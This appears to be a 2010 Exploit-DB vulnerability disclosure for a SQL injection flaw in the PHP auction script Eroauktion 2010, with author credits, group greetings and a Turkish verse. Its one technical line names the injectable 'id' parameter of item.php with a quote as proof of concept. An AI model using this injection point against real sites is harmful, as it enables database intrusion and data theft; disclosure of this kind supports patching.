Ero Auktion 2010 - 'item.php' SQL Injection

EDB-ID:

15769




Platform:

PHP

Date:

2010-12-18


+Name : Eroauktion 2010 <= SQL injection Vulnerability Proof of Concept
+Autor : DeadLy DeMon
+Date : 18.12.2010
+Script : Eroauktion 2010
+Download : ----
+Dork : Not Dork
+Price : 39.90  EURO
+Language : PHP
+Tests : Windows XP SP 3 and Backtrack4 any other OS
+Discovered by DeadLy DeMon
+ Cyber - Warrir TIM =>> www.cyber-warrior.org
+Greetz to All Cyber-Warrior Members
---------------------------------------------------------------------------------------



Kah çıkarım gökyüzüne seyrederim alemi kah inerim yeryüzüne seyreder alem
beni beni :)))
----------------------------------------------------------------------------------------

Bug ;

server/flashauktion2010/item.php?id=' [Sql Inj. ]
---------------------------------------------------------------------------------------